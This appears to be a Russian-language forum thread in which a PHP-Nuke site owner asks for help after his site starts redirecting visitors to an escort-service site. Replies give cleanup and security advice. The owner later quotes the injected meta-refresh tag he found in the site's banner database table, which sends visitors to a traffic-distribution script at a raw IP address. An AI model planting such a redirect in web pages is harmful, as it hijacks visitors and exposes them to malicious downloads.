взломан сайт
 

Всем привет!
Взломали сайт - не могу найти проблему.(А первоночально взломали аську. Через некоторое время и сайт.) Nuke 7.9 После захода на главную http://izberg.net.ua/ через несколько сек. в этом окне переключает на сайт досуга http://www.dosug.nu/servlet/ru/kiev/ Обратился к хостеру, он сказал поменять индекс, пароли фтп, БД. Все это зделал, а "воз и ныне там"... Что это может быть? Помогите, если знаете!

если аську сломали, значит протроянили.
уперли и фтп.
и залить туда могли что угодно и куда угодно.

проверять все файлы на хосте.

и в первую очередь - свой комп. если троян не удалил, хоть меняй пасы, хоть не меняй.

Спасибо большое за ответ Alexander-V-Sh !!! А куда хоть примерно могли вставить, подскажите или какие надписи??????

я бы например, полностью перезалил весь сайт или сравнивал даты изменения файлов.
плюс проверил все директории.

а вообще то врядли что то во внутрь залили. поэтому, имхо, достаточно удалить трояна, сделать защиту (чтобы больше не пролез).
а на сайте заменить индекс, майнфайл, ну и тему можно.

думаю этого будет достаточно.

Спасибо за ответ, ничего это не помогло, перезалил сайт полностью. Ну, думаю, все велл... Хрена, я вообще очень РАЗОЗЛИЛСЯ, на хостера наехал. Он чуть не закрыл аккаунт. Скачал дамп БД. Проверил по поиску http://81.29.241.195/ Не поверете, нахожу в таблице nuke_banner вот такое, которое вдвое повышало трафик, которое со 100-120 посетителей скатило до 10-20 в день, которое понизило ТИЦ : <meta http-equiv=\"refresh\" content=\"0; url=http://81.29.241.195/tds/go.php?sid=3\"> Только осторожно, эти фтп трояны - доунлоадеры, просто так не кликайте. Это руководство: где таких гадов искать!

:whistle: господа!

не передавайте информацию, относительно паролей, логинов, другой конфедициальной инфы по аське - она взламывается на ура всякими уродами. по аське договаривайтесь, но инфу скидывайте , хотя-бы по мылу.

все уже было сказано но я :-) добавлю (реком)
1. никогда (избегать) не пользоватся Ftp (парол) - для слива и т.д. (лючше модуль какойнибуть! :-))
2. сатив вир машину читую и дела все через нее и только по вебу своего сайта- если троя попадет на машину то вероятност то что он попадет на вир.машин почти 0%.
3. создать вир.машин для интернета (не вводить ни каких паролей), ели вирус попадет то нежалко снести ос.
из практического опыта!
ну все.

Здравствуйте!
У меня случилось почти то-же самое.
Установил на сайте модуль 4nAlbum. Там есть возможность загружать пользователями фотографии, но для этого нужно на папку temp установить права 777, что я и сделал.
А буквально через пару дней в эту папку залили СПАМ-СКРИПТ, за что мой хостер отключил мой сайт. Кто-нибудь может посоветовать, как обезопасить папки с правами доступа 777 от заливки туда "плохих" файлов?

Я бы создал еще 1 папку, а в папке temp текстовый документ, в котором написано куда пересылать файлы, инфу и др. вот тока сам код который должен быть в документе непомню... и с помощью этого все пересылаетсо в созданую папку... ну просто у меня была подобная ситуация, я так сделал и гуд.

попробуйте сначало установить хотфикс http://warpspeed.4thdimension.de/mo...etails&lid=5176